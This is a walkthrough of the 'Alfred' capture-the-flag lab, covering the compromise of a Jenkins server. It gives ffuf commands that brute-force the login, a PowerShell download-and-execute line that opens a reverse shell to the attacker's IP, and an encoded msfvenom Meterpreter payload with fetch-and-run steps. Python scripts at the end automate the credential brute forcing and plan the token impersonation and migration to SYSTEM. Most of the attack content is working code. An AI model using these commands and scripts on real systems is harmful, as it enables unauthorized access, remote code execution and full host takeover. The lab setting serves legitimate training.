# Alfred

[TOC]

###### tags: `vulnerableMachine`

Automation server (Jenkins): the tool used to deploy code automatically whenever a change is made to it.

Jenkins is an open-source continuous integration (CI) tool that supports a development team's continuous integration and deployment workflow. It can run tests, package and deploy builds automatically, and notify team members of failures. With Jenkins, a team can detect problems sooner and fix them faster, improving software quality.

## Initial Access

> How many ports are open? (TCP only)

![](https://i.imgur.com/MUtJWc0.png)
![](https://i.imgur.com/6PQtdwr.png)

Ans 3

---

> What is the username and password for the log in panel (in the format username:password)

Login page -> we can brute-force it to find the account and password.

![](https://i.imgur.com/1enOqD5.png)

Jenkins answers the login POST with a 302 redirect either way: to `/loginError` (which shows "Invalid username or password") on a bad guess, and to `/` on success. Matching or filtering on the status code alone therefore separates nothing, so tell ffuf to follow the redirect (`-r`) and filter out the responses that contain the error text (`-fr`); whatever remains is a valid pair.

Cluster-bomb mode, trying every username in `fasttrack.txt` against every password in `rockyou.txt`:

```
ffuf -u http://10.10.212.65:8080/j_acegi_security_check -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "j_username=w1&j_password=w2" \
  -w fasttrack.txt:w1,rockyou.txt:w2 \
  -r -fr "Invalid username or password"
```

Or, fixing the username to `admin` and fuzzing only the password:

```
ffuf -u http://10.10.239.38:8080/j_acegi_security_check -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "j_username=admin&j_password=FUZZ" \
  -w rockyou.txt \
  -r -fr "Invalid username or password"
```

admin:admin

![](https://i.imgur.com/FR2MHOQ.png)

### PowerShell

![](https://i.imgur.com/6oJ7qcH.png)
![](https://i.imgur.com/yvfoTpJ.png)

The command below goes into a build step of the Jenkins project (Configure -> Build -> Execute Windows batch command), which Jenkins runs on its own host when the project is built. It fetches Nishang's `Invoke-PowerShellTcp.ps1` from our web server on port 8000 and calls it to connect back to our listener on port 443, so both the web server and the listener must be running before the build is triggered.

```
powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.11.72:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.11.72 -Port 443
```

`New-Object Net.WebClient` downloads the script as a string and `iex` (`Invoke-Expression`) executes it straight from memory, so nothing is written to disk.

### Shell Mode

- Bind: the target listens on a port and the attacker connects to it.
- Reverse: the target connects back to a listener on the attacker's machine (the mode used here; it also gets through firewalls that block inbound connections).

![](https://i.imgur.com/Aoy26fE.png)
![](https://i.imgur.com/eqIxkLJ.png)
![](https://i.imgur.com/xlyqcQR.png)

## Switching Shells

Meterpreter

Generate a staged x86 Meterpreter executable that connects back to port 80:

```
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=80 -f exe -o meowmeowshell.exe
```

TCP handler: `exploit/multi/handler` in msfconsole, configured with the same payload, LHOST and LPORT as the executable.

![](https://i.imgur.com/2vKI9TU.png)

Running from the PowerShell shell on the target (`DownloadFile` returns nothing, so there is nothing for `iex` to run; just call it):

```
powershell (New-Object System.Net.WebClient).DownloadFile('http://10.17.11.72:8000/meowmeowshell.exe','meowmeowshell.exe')
```

or

```
Invoke-WebRequest -Uri http://10.17.11.72:8000/meowmeowshell.exe -OutFile .\meowmeowshell.exe
```

Execute the shell:

```
Start-Process meowmeowshell.exe
```

Got it!!!

![](https://i.imgur.com/UEc3L7M.png)

## Privilege Escalation

Goal: use an access token to gain SYSTEM.

Tokens are created at logon by LSASS.exe; every process carries one and it decides what the process may do.

![](https://i.imgur.com/57lKizf.png)
![](https://i.imgur.com/VrDEiuj.png)

### Token type

Primary tokens describe the security context of the process itself; impersonation tokens let a thread temporarily act as another principal (for example a service handling a client's request).

![](https://i.imgur.com/woPRayt.png)

### impersonate token (Process)

![](https://i.imgur.com/0GZvf6F.png)

> View all the privileges using whoami /priv

![](https://i.imgur.com/DRgcgzA.png)

---

![](https://i.imgur.com/Bq1y2Qo.png)

---

![](https://i.imgur.com/ExAOVqd.png)
![](https://i.imgur.com/yAOxIir.png)

---

To check which tokens are available, listed by group:

![](https://i.imgur.com/ycPKnjN.png)
![](https://i.imgur.com/8MxJIM8.png)

---

Impersonate the local SYSTEM token:

![](https://i.imgur.com/bL29fgO.png)
![](https://i.imgur.com/Hrr80qZ.png)

## Now we have to migrate

Windows uses the primary token of the process, not the impersonated token, to decide what the process can and cannot do, so even after impersonation our own process is still limited. The fix is to migrate into a process whose primary token already belongs to NT AUTHORITY\SYSTEM.

![](https://i.imgur.com/mrctv4i.png)

Migrate into a process running as NT AUTHORITY\SYSTEM:

![](https://i.imgur.com/vPYiXpJ.png)

```
migrate 668
```

![](https://i.imgur.com/ZrdJRtm.png)

Ans dff0f748678f280250f25a45b8046b4a
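The login check that the ffuf commands in Initial Access rely on, written out in Python so the success/failure decision is explicit. This is an added example for this writeup, not code from the original page or from the Jenkins project; the host, the two-entry wordlists and the `fake_jenkins` stand-in are constructed, and the only Jenkins behaviour assumed is that the POST to `/j_acegi_security_check` redirects to `/loginError` on a bad guess and to the `from` target (`/`) on a good one.

```python
"""Jenkins form-login brute force: tell success from failure by the redirect.

Added example for this writeup (not code from the original page or from the
Jenkins project). Host, port and the small constructed wordlists below are
assumptions; the only Jenkins behaviour relied on is that the form POST to
/j_acegi_security_check redirects to /loginError on a bad guess and to the
'from' target (/) on a good one.
"""
import urllib.error
import urllib.parse
import urllib.request
from itertools import product

LOGIN_PATH = "/j_acegi_security_check"
ERROR_PATH = "/loginError"


def classify(status, location):
    """Classify one login response from its status and Location header.

    Returns "failure" for the /loginError redirect, "success" for any other
    redirect, and "unknown" for anything that is not a redirect (e.g. a 403
    from a proxy, or a 200 that means the request never reached Jenkins).
    """
    if status not in (301, 302, 303, 307):
        return "unknown"
    path = urllib.parse.urlsplit(location or "").path
    if path.rstrip("/").endswith(ERROR_PATH):
        return "failure"
    return "success"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects: the Location header itself is the signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def try_login(base_url, username, password, timeout=5):
    """POST one credential pair; return (status, location) without following it."""
    body = urllib.parse.urlencode(
        {"j_username": username, "j_password": password, "from": "/", "Submit": "Sign in"}
    ).encode()
    req = urllib.request.Request(base_url.rstrip("/") + LOGIN_PATH, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # the 3xx lands here because we refused to follow it
        return err.code, err.headers.get("Location")


def brute_force(base_url, usernames, passwords, attempt=try_login):
    """Cluster-bomb every username against every password; return the first
    valid (user, password) pair or None. `attempt` is injectable so the search
    can be exercised offline against canned responses."""
    for user, pw in product(usernames, passwords):
        verdict = classify(*attempt(base_url, user, pw))
        if verdict == "success":
            return user, pw
        if verdict == "unknown":
            raise RuntimeError(f"unexpected response for {user}:{pw}; stop and look before continuing")
    return None


def fake_jenkins(base_url, user, pw):
    """Constructed stand-in for the target: only admin:admin is accepted."""
    if (user, pw) == ("admin", "admin"):
        return 302, base_url + "/"
    return 302, base_url + ERROR_PATH


if __name__ == "__main__":
    target = "http://10.10.212.65:8080"  # assumed lab address
    print(brute_force(target, ["jenkins", "admin"], ["password", "admin"], attempt=fake_jenkins))
    # Against a live box: brute_force(target, users, passwords) with the real try_login.
```

The `unknown` verdict is deliberately fatal: an account lockout, a WAF or a proxy in front of Jenkins changes the response shape, and silently treating those as failures would burn the rest of the wordlist without ever finding the valid pair.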
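The two checks the Privilege Escalation section makes by eye (which privileges `whoami /priv` shows, and which SYSTEM process to `migrate` into) as a small triage script. This is an added example for this writeup, not code from the original page, Metasploit or incognito; the `whoami /priv` and Meterpreter `ps` listings in it are constructed to look like real output and are not captures from the box, and the preferred-process list is my own choice.

```python
"""Post-exploitation triage for the token path used above: which privileges
the shell holds, and which SYSTEM processes are safe to migrate into.

Added example for this writeup (not code from the original page, Metasploit
or incognito). SAMPLE_PRIV and SAMPLE_PS are constructed to look like
`whoami /priv` and Meterpreter `ps` output; they are not captures from the box.
"""
import re

# Privileges that matter for impersonation and migration, and what each buys.
TOKEN_PRIVS = {
    "SeImpersonatePrivilege": "impersonate a token this process can see (incognito impersonate_token)",
    "SeAssignPrimaryTokenPrivilege": "start a new process with a borrowed token",
    "SeDebugPrivilege": "open any process, so migrate into one running as SYSTEM",
}
# Never migrate into these: killing them takes the host down or they are protected.
AVOID = {"system", "smss.exe", "csrss.exe", "wininit.exe", "lsass.exe"}
# Long-lived SYSTEM services that make stable hosts for a Meterpreter session (my preference order).
PREFERRED = ["services.exe", "winlogon.exe", "spoolsv.exe", "svchost.exe"]

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
PS_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+"
    r"(?P<session>\d+)\s+(?P<user>\S+(?: \S+)*?)(?:\s{2,}\S.*)?\s*$"
)

SAMPLE_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
"""

SAMPLE_PS = """\
 PID   PPID  Name          Arch  Session  User                 Path
 ---   ----  ----          ----  -------  ----                 ----
 4     0     System        x64   0
 332   4     smss.exe      x64   0        NT AUTHORITY\\SYSTEM  C:\\Windows\\System32\\smss.exe
 668   588   services.exe  x64   0        NT AUTHORITY\\SYSTEM  C:\\Windows\\System32\\services.exe
 676   588   lsass.exe     x64   0        NT AUTHORITY\\SYSTEM  C:\\Windows\\System32\\lsass.exe
 1816  668   spoolsv.exe   x64   0        NT AUTHORITY\\SYSTEM  C:\\Windows\\System32\\spoolsv.exe
 2240  668   jenkins.exe   x86   0        ALFRED\\jenkins       C:\\Program Files (x86)\\Jenkins\\jenkins.exe
"""


def parse_whoami_priv(text):
    """Map privilege name -> True if Enabled, False if present but Disabled."""
    return {m.group(1): m.group(2) == "Enabled"
            for m in map(PRIV_RE.match, text.splitlines()) if m}


def parse_ps(text):
    """Parse Meterpreter `ps` rows into dicts; rows with no User column are skipped."""
    rows = []
    for m in map(PS_RE.match, text.splitlines()):
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            rows.append(row)
    return rows


def migration_targets(ps_text, arch="x86"):
    """PIDs of SYSTEM-owned processes worth migrating into, best first:
    same architecture as our payload preferred, critical processes skipped."""
    cands = [p for p in parse_ps(ps_text)
             if p["user"].upper() == "NT AUTHORITY\\SYSTEM" and p["name"].lower() not in AVOID]

    def rank(p):
        name = p["name"].lower()
        pref = PREFERRED.index(name) if name in PREFERRED else len(PREFERRED)
        return (p["arch"] != arch, pref, p["pid"])

    return [p["pid"] for p in sorted(cands, key=rank)]


def plan(priv_text, ps_text, arch="x86"):
    """Turn the two listings into the sequence of Meterpreter steps to try."""
    privs = parse_whoami_priv(priv_text)
    steps = []
    for name, why in TOKEN_PRIVS.items():
        if name in privs:
            state = "enabled" if privs[name] else "present but disabled (enable it first)"
            steps.append(f"{name} {state}: {why}")
    if privs.get("SeImpersonatePrivilege"):
        steps.append("load incognito; list_tokens -g; impersonate_token <a SYSTEM/Administrators group token>")
    targets = migration_targets(ps_text, arch)
    if targets:
        steps.append(f"migrate {targets[0]}   # SYSTEM primary token; fallbacks: {targets[1:4]}")
    return steps


if __name__ == "__main__":
    for step in plan(SAMPLE_PRIV, SAMPLE_PS):
        print(step)
```

`migration_targets` only ranks by architecture rather than excluding mismatches, because Meterpreter can inject across architectures; same-arch is simply the path that fails least often. The last planned step is the `migrate` into the process with a SYSTEM primary token, which is the point the section makes: impersonation alone does not change what our own process is allowed to do.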